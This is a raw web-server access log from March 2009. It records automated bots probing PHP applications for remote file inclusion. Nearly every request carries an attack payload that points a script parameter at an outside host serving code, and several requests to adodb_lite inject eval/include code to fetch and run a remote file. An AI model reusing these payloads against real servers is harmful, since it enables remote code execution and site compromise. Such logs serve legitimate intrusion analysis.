87.101.4.49 - - [24/Mar/2009:00:26:30 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://weko.co.kr/data/file/notice/test.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
87.101.4.49 - - [24/Mar/2009:00:26:30 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://weko.co.kr/data/file/notice/test.txt???? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
69.20.61.23 - - [24/Mar/2009:00:31:26 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://71.39.154.29/roundcubemail/bin/TT??? HTTP/1.0" 404 330 "-""libwww-perl/5.53"
69.20.61.23 - - [24/Mar/2009:00:31:26 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://71.39.154.29/roundcubemail/bin/TT??? HTTP/1.0" 404 325 "-""libwww-perl/5.53"
146.164.3.7 - - [24/Mar/2009:00:37:17 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://71.39.154.29/roundcubemail/bin/TT??? HTTP/1.1" 404 342 "-""libwww-perl/5.803"
146.164.3.7 - - [24/Mar/2009:00:37:18 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://71.39.154.29/roundcubemail/bin/TT??? HTTP/1.1" 404 337 "-""libwww-perl/5.803"
189.35.16.44 - - [24/Mar/2009:00:37:53 -0500] "GET /logs/access_log.1225238400//errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
91.142.214.149 - - [24/Mar/2009:00:42:50 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://71.39.154.29/roundcubemail/bin/TT??? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
91.142.214.149 - - [24/Mar/2009:00:42:50 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://71.39.154.29/roundcubemail/bin/TT??? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
91.142.214.149 - - [24/Mar/2009:00:42:51 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://71.39.154.29/roundcubemail/bin/TT??? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
91.142.214.149 - - [24/Mar/2009:00:42:51 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://71.39.154.29/roundcubemail/bin/TT??? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
89.186.1.54 - - [24/Mar/2009:00:47:37 -0500] "GET //include/vote.lib.inc.php?site_path=http://sava-mebel.ru//assets/images/ID.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.800"
89.186.1.54 - - [24/Mar/2009:00:47:38 -0500] "GET /logs//include/vote.lib.inc.php?site_path=http://sava-mebel.ru//assets/images/ID.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.800"
89.186.1.54 - - [24/Mar/2009:00:47:59 -0500] "GET /logs//include/vote.lib.inc.php?site_path=http://sava-mebel.ru//assets/images/ID.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.800"
89.186.1.54 - - [24/Mar/2009:00:47:59 -0500] "GET //include/vote.lib.inc.php?site_path=http://sava-mebel.ru//assets/images/ID.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.800"
89.186.1.54 - - [24/Mar/2009:00:48:01 -0500] "GET /logs//include/vote.lib.inc.php?site_path=http://sava-mebel.ru//assets/images/ID.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.800"
89.186.1.54 - - [24/Mar/2009:00:48:02 -0500] "GET //include/vote.lib.inc.php?site_path=http://sava-mebel.ru//assets/images/ID.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.800"
203.130.236.211 - - [24/Mar/2009:00:51:22 -0500] "GET /logs//include/vote.lib.inc.php?site_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
203.130.236.211 - - [24/Mar/2009:00:51:23 -0500] "GET //include/vote.lib.inc.php?site_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
216.246.99.99 - - [24/Mar/2009:00:56:02 -0500] "GET /logs/access_log.1228608000//kboard.php?board=http://irgi.italianzone.eu/media/irgi/fx29id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.246.99.99 - - [24/Mar/2009:00:56:02 -0500] "GET //kboard.php?board=http://irgi.italianzone.eu/media/irgi/fx29id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
216.246.99.99 - - [24/Mar/2009:00:56:02 -0500] "GET /logs//kboard.php?board=http://irgi.italianzone.eu/media/irgi/fx29id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
216.246.99.99 - - [24/Mar/2009:00:56:02 -0500] "GET /logs/access_log.1232409600//kboard.php?board=http://irgi.italianzone.eu/media/irgi/fx29id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
12.53.219.68 - - [24/Mar/2009:01:01:51 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.lennex.com/images/6.jpg?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
12.53.219.68 - - [24/Mar/2009:01:01:51 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.lennex.com/images/6.jpg?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
83.64.132.254 - - [24/Mar/2009:01:03:52 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.nis-network.org/joomla/cmd.do?? HTTP/1.1" 404 314 "-""libwww-perl/5.76"
83.64.132.254 - - [24/Mar/2009:01:03:53 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.nis-network.org/joomla/cmd.do?? HTTP/1.1" 404 309 "-""libwww-perl/5.76"
83.64.132.254 - - [24/Mar/2009:01:03:54 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.nis-network.org/joomla/cmd.do?? HTTP/1.1" 404 314 "-""libwww-perl/5.76"
83.64.132.254 - - [24/Mar/2009:01:03:54 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.nis-network.org/joomla/cmd.do?? HTTP/1.1" 404 309 "-""libwww-perl/5.76"
89.186.1.54 - - [24/Mar/2009:01:10:07 -0500] "GET /logs//include/vote.lib.inc.php?site_path=http://sava-mebel.ru//assets/images/ID.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.800"
89.186.1.54 - - [24/Mar/2009:01:10:07 -0500] "GET //include/vote.lib.inc.php?site_path=http://sava-mebel.ru//assets/images/ID.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.800"
202.60.72.43 - - [24/Mar/2009:01:10:45 -0500] "GET /logs/access_log.1233878400//include/admin.lib.inc.php?site_path=http://freenet.am/~h4ck1nf0/FX29ID1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
202.60.72.43 - - [24/Mar/2009:01:10:45 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://freenet.am/~h4ck1nf0/FX29ID1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
202.60.72.43 - - [24/Mar/2009:01:10:45 -0500] "GET //include/admin.lib.inc.php?site_path=http://freenet.am/~h4ck1nf0/FX29ID1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
202.60.72.43 - - [24/Mar/2009:01:11:19 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://freenet.am/~h4ck1nf0/FX29ID1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
122.201.76.100 - - [24/Mar/2009:01:14:00 -0500] "GET /logs/access_log.1230422400/bbshop/shop/index.php?page=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
122.201.76.100 - - [24/Mar/2009:01:14:00 -0500] "GET /logs/access_log.1228608000/bbshop/shop/index.php?page=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
122.201.76.100 - - [24/Mar/2009:01:14:00 -0500] "GET /bbshop/shop/index.php?page=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
122.201.76.100 - - [24/Mar/2009:01:14:00 -0500] "GET /logs/bbshop/shop/index.php?page=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
122.201.76.100 - - [24/Mar/2009:01:17:42 -0500] "GET /logs/access_log.1235692800/?DOCUMENT_ROOT=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
122.201.76.100 - - [24/Mar/2009:01:17:42 -0500] "GET /?DOCUMENT_ROOT=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
122.201.76.100 - - [24/Mar/2009:01:17:44 -0500] "GET /logs/?DOCUMENT_ROOT=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 200 182826 "-""Mozilla/5.0"
211.43.205.222 - - [24/Mar/2009:01:17:53 -0500] "GET //include/lib.inc.php?site_path=http://www.yihshen.com.tw/gmail/data/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
211.43.205.222 - - [24/Mar/2009:01:17:53 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.yihshen.com.tw/gmail/data/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.43.205.222 - - [24/Mar/2009:01:17:53 -0500] "GET /logs/access_log.1232150400//include/lib.inc.php?site_path=http://www.yihshen.com.tw/gmail/data/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
211.43.205.222 - - [24/Mar/2009:01:18:23 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://www.yihshen.com.tw/gmail/data/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
201.232.54.48 - - [24/Mar/2009:01:19:07 -0500] "GET //include/lib.inc.php?site_path=http://www.haesung.hs.kr//upload/fx29id2.txt???? HTTP/1.1" 404 303 "-""Mozilla/5.0"
201.232.54.48 - - [24/Mar/2009:01:19:07 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.haesung.hs.kr//upload/fx29id2.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
201.232.54.48 - - [24/Mar/2009:01:19:07 -0500] "GET /logs/access_log.1232150400//include/lib.inc.php?site_path=http://www.haesung.hs.kr//upload/fx29id2.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
201.232.54.48 - - [24/Mar/2009:01:20:05 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://www.haesung.hs.kr//upload/fx29id2.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
65.55.230.164 - - [24/Mar/2009:01:21:27 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.230.164 - - [24/Mar/2009:01:21:28 -0500] "GET /logs/access_log.1234483200 HTTP/1.1" 200 148921 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
202.60.72.43 - - [24/Mar/2009:01:23:16 -0500] "GET /logs/access_log.1235692800//?DOCUMENT_ROOT=http://freenet.am/~h4ck1nf0/FX29ID1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
202.60.72.43 - - [24/Mar/2009:01:23:16 -0500] "GET //?DOCUMENT_ROOT=http://freenet.am/~h4ck1nf0/FX29ID1.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
202.60.72.43 - - [24/Mar/2009:01:23:19 -0500] "GET /logs//?DOCUMENT_ROOT=http://freenet.am/~h4ck1nf0/FX29ID1.txt??? HTTP/1.1" 200 182831 "-""Mozilla/5.0"
218.38.55.195 - - [24/Mar/2009:01:31:16 -0500] "GET /logs/access_log.1232150400//include/lib.inc.php?site_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
75.145.152.113 - - [24/Mar/2009:01:31:24 -0500] "GET /logs/access_log.1235606400/xfsection/modify.php?dir_module=http://www.rapidfiretheatre.com/textpattern/pulaid.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
75.145.152.113 - - [24/Mar/2009:01:31:24 -0500] "GET /xfsection/modify.php?dir_module=http://www.rapidfiretheatre.com/textpattern/pulaid.txt???? HTTP/1.1" 404 303 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
75.145.152.113 - - [24/Mar/2009:01:31:24 -0500] "GET /logs/xfsection/modify.php?dir_module=http://www.rapidfiretheatre.com/textpattern/pulaid.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
75.145.152.113 - - [24/Mar/2009:01:31:24 -0500] "GET /logs/access_log.1236038400/xfsection/modify.php?dir_module=http://www.rapidfiretheatre.com/textpattern/pulaid.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
218.38.55.195 - - [24/Mar/2009:01:31:27 -0500] "GET //include/lib.inc.php?site_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
218.27.203.107 - - [24/Mar/2009:01:31:31 -0500] "GET /logs/access_log.1235952000/spaw_control.class.php?spaw_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
218.27.203.107 - - [24/Mar/2009:01:31:31 -0500] "GET /spaw_control.class.php?spaw_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
218.27.203.107 - - [24/Mar/2009:01:31:31 -0500] "GET /logs/spaw_control.class.php?spaw_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.27.203.107 - - [24/Mar/2009:01:31:31 -0500] "GET /logs/access_log.1235865600/spaw_control.class.php?spaw_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
218.38.55.195 - - [24/Mar/2009:01:31:35 -0500] "GET /logs/access_log.1234828800//include/lib.inc.php?site_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
218.27.203.107 - - [24/Mar/2009:01:31:41 -0500] "GET /logs/access_log.1236124800/spaw_control.class.php?spaw_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
218.38.55.195 - - [24/Mar/2009:01:31:52 -0500] "GET //include/lib.inc.php?site_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
218.38.55.195 - - [24/Mar/2009:01:31:52 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
218.27.203.107 - - [24/Mar/2009:01:31:52 -0500] "GET /spaw_control.class.php?spaw_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
218.27.203.107 - - [24/Mar/2009:01:31:52 -0500] "GET /logs/access_log.1235865600/spaw_control.class.php?spaw_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
218.27.203.107 - - [24/Mar/2009:01:31:53 -0500] "GET /logs/spaw_control.class.php?spaw_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.27.203.107 - - [24/Mar/2009:01:31:53 -0500] "GET /logs/access_log.1235952000/spaw_control.class.php?spaw_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
218.27.203.107 - - [24/Mar/2009:01:31:59 -0500] "GET /logs/access_log.1236124800/spaw_control.class.php?spaw_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
218.38.55.195 - - [24/Mar/2009:01:32:01 -0500] "GET /logs/access_log.1232150400//include/lib.inc.php?site_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
58.226.23.55 - - [24/Mar/2009:01:35:43 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://gumansin.com/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
58.226.23.55 - - [24/Mar/2009:01:35:43 -0500] "GET /logs/access_log.1235692800/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://gumansin.com/id.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
58.226.23.55 - - [24/Mar/2009:01:35:43 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://gumansin.com/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
123.214.171.106 - - [24/Mar/2009:01:38:43 -0500] "GET /logs//errors.php?error=http://shw.or.kr/bbs/bbs_public/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
123.214.171.106 - - [24/Mar/2009:01:38:43 -0500] "GET //errors.php?error=http://shw.or.kr/bbs/bbs_public/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
123.214.171.106 - - [24/Mar/2009:01:38:43 -0500] "GET /logs/access_log.1228694400//errors.php?error=http://shw.or.kr/bbs/bbs_public/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
123.214.171.106 - - [24/Mar/2009:01:38:43 -0500] "GET /logs/access_log.1228521600//errors.php?error=http://shw.or.kr/bbs/bbs_public/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
203.130.236.211 - - [24/Mar/2009:01:41:41 -0500] "GET /logs//include/vote.lib.inc.php?site_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
203.130.236.211 - - [24/Mar/2009:01:41:42 -0500] "GET //include/vote.lib.inc.php?site_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
123.214.171.106 - - [24/Mar/2009:01:43:38 -0500] "GET /logs/access_log.1227916800//errors.php?error=http://shw.or.kr/bbs/bbs_public/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
123.214.171.106 - - [24/Mar/2009:01:43:38 -0500] "GET /logs/access_log.1225238400//errors.php?error=http://shw.or.kr/bbs/bbs_public/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
75.145.152.113 - - [24/Mar/2009:01:43:47 -0500] "GET /logs/access_log.1236038400/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.rapidfiretheatre.com/textpattern/pulaid.txt???? HTTP/1.1" 404 366 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
75.145.152.113 - - [24/Mar/2009:01:43:47 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.rapidfiretheatre.com/textpattern/pulaid.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
75.145.152.113 - - [24/Mar/2009:01:43:48 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.rapidfiretheatre.com/textpattern/pulaid.txt???? HTTP/1.1" 404 344 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
75.145.152.113 - - [24/Mar/2009:01:44:03 -0500] "GET /logs/access_log.1235779200/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.rapidfiretheatre.com/textpattern/pulaid.txt???? HTTP/1.1" 404 366 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
200.45.224.18 - - [24/Mar/2009:01:44:13 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://gumansin.com/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
200.45.224.18 - - [24/Mar/2009:01:44:13 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://gumansin.com/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
200.45.224.18 - - [24/Mar/2009:01:44:13 -0500] "GET /logs/access_log.1235692800/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://gumansin.com/id.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
85.119.154.60 - - [24/Mar/2009:01:46:35 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://gumansin.com/id.txt?? HTTP/1.0" 404 331 "-""Mozilla/5.0"
85.119.154.60 - - [24/Mar/2009:01:46:35 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://gumansin.com/id.txt?? HTTP/1.0" 404 336 "-""Mozilla/5.0"
85.119.154.60 - - [24/Mar/2009:01:46:36 -0500] "GET /logs/access_log.1236038400/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://gumansin.com/id.txt?? HTTP/1.0" 404 358 "-""Mozilla/5.0"
85.119.154.60 - - [24/Mar/2009:01:46:43 -0500] "GET /logs/access_log.1235779200/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://gumansin.com/id.txt?? HTTP/1.0" 404 358 "-""Mozilla/5.0"
123.214.171.106 - - [24/Mar/2009:01:46:55 -0500] "GET /logs/access_log.1229126400//errors.php?error=http://shw.or.kr/bbs/bbs_public/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
85.119.154.60 - - [24/Mar/2009:01:46:58 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://gumansin.com/id.txt?? HTTP/1.0" 404 331 "-""Mozilla/5.0"
85.119.154.60 - - [24/Mar/2009:01:46:58 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://gumansin.com/id.txt?? HTTP/1.0" 404 336 "-""Mozilla/5.0"
85.119.154.60 - - [24/Mar/2009:01:46:59 -0500] "GET /logs/access_log.1236038400/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://gumansin.com/id.txt?? HTTP/1.0" 404 358 "-""Mozilla/5.0"
85.119.154.60 - - [24/Mar/2009:01:47:05 -0500] "GET /logs/access_log.1235779200/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://gumansin.com/id.txt?? HTTP/1.0" 404 358 "-""Mozilla/5.0"
85.119.154.60 - - [24/Mar/2009:01:47:18 -0500] "GET /logs/access_log.1236124800/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://gumansin.com/id.txt?? HTTP/1.0" 404 358 "-""Mozilla/5.0"
85.119.154.60 - - [24/Mar/2009:01:47:38 -0500] "GET /logs/access_log.1236124800/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://gumansin.com/id.txt?? HTTP/1.0" 404 358 "-""Mozilla/5.0"
123.214.171.106 - - [24/Mar/2009:01:47:59 -0500] "GET /logs/access_log.1228608000//errors.php?error=http://shw.or.kr/bbs/bbs_public/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
75.145.152.113 - - [24/Mar/2009:01:48:26 -0500] "GET /logs/access_log.1236124800/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.rapidfiretheatre.com/textpattern/pulaid.txt???? HTTP/1.1" 404 366 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
123.214.171.106 - - [24/Mar/2009:01:51:33 -0500] "GET /logs/access_log.1226966400//errors.php?error=http://shw.or.kr/bbs/bbs_public/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
211.202.2.220 - - [24/Mar/2009:01:53:12 -0500] "GET //include/write.php?dir=http://www.ymti.org/de/xoops_lib/modules/protector/language/japanese/copyright.txt????? HTTP/1.1" 404 301 "-""Mozilla/5.0"
211.202.2.220 - - [24/Mar/2009:01:53:12 -0500] "GET /logs//include/write.php?dir=http://www.ymti.org/de/xoops_lib/modules/protector/language/japanese/copyright.txt????? HTTP/1.1" 404 306 "-""Mozilla/5.0"
211.202.2.220 - - [24/Mar/2009:01:53:12 -0500] "GET /logs/access_log.1230422400//include/write.php?dir=http://www.ymti.org/de/xoops_lib/modules/protector/language/japanese/copyright.txt????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
211.202.2.220 - - [24/Mar/2009:01:53:40 -0500] "GET //include/write.php?dir=http://www.ymti.org/de/xoops_lib/modules/protector/language/japanese/copyright.txt????? HTTP/1.1" 404 301 "-""Mozilla/5.0"
211.202.2.220 - - [24/Mar/2009:01:53:40 -0500] "GET /logs/access_log.1230422400//include/write.php?dir=http://www.ymti.org/de/xoops_lib/modules/protector/language/japanese/copyright.txt????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
211.202.2.220 - - [24/Mar/2009:01:53:41 -0500] "GET /logs//include/write.php?dir=http://www.ymti.org/de/xoops_lib/modules/protector/language/japanese/copyright.txt????? HTTP/1.1" 404 306 "-""Mozilla/5.0"
123.214.171.106 - - [24/Mar/2009:01:54:06 -0500] "GET /logs/access_log.1228003200//errors.php?error=http://shw.or.kr/bbs/bbs_public/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
83.64.132.254 - - [24/Mar/2009:01:56:11 -0500] "GET /logs/access_log.1232150400//?_zb_path=http://www.xgamex.org/fx29id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
83.64.132.254 - - [24/Mar/2009:01:56:12 -0500] "GET //?_zb_path=http://www.xgamex.org/fx29id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
83.64.132.254 - - [24/Mar/2009:01:57:08 -0500] "GET /logs/access_log.1231891200//?_zb_path=http://www.xgamex.org/fx29id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
201.232.54.48 - - [24/Mar/2009:01:58:29 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.haesung.hs.kr//upload/fx29id2.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
201.232.54.48 - - [24/Mar/2009:01:58:29 -0500] "GET //include/lib.inc.php?site_path=http://www.haesung.hs.kr//upload/fx29id2.txt???? HTTP/1.1" 404 303 "-""Mozilla/5.0"
201.232.54.48 - - [24/Mar/2009:01:58:29 -0500] "GET /logs/access_log.1233878400//include/lib.inc.php?site_path=http://www.haesung.hs.kr//upload/fx29id2.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
201.232.54.48 - - [24/Mar/2009:01:59:12 -0500] "GET /logs/access_log.1234224000//include/lib.inc.php?site_path=http://www.haesung.hs.kr//upload/fx29id2.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
163.24.136.10 - - [24/Mar/2009:02:01:54 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.sextalkforums.net/forums//tmp/idv6.txt?%0D?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
163.24.136.10 - - [24/Mar/2009:02:01:56 -0500] "GET //skin/zero_vote/error.php?dir=http://www.sextalkforums.net/forums//tmp/idv6.txt?%0D?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
89.186.1.54 - - [24/Mar/2009:02:07:46 -0500] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://sava-mebel.ru//assets/images/ID.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.800"
89.186.1.54 - - [24/Mar/2009:02:07:46 -0500] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://sava-mebel.ru//assets/images/ID.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.800"
89.186.1.54 - - [24/Mar/2009:02:07:56 -0500] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://sava-mebel.ru//assets/images/ID.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.800"
89.186.1.54 - - [24/Mar/2009:02:07:56 -0500] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://sava-mebel.ru//assets/images/ID.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.800"
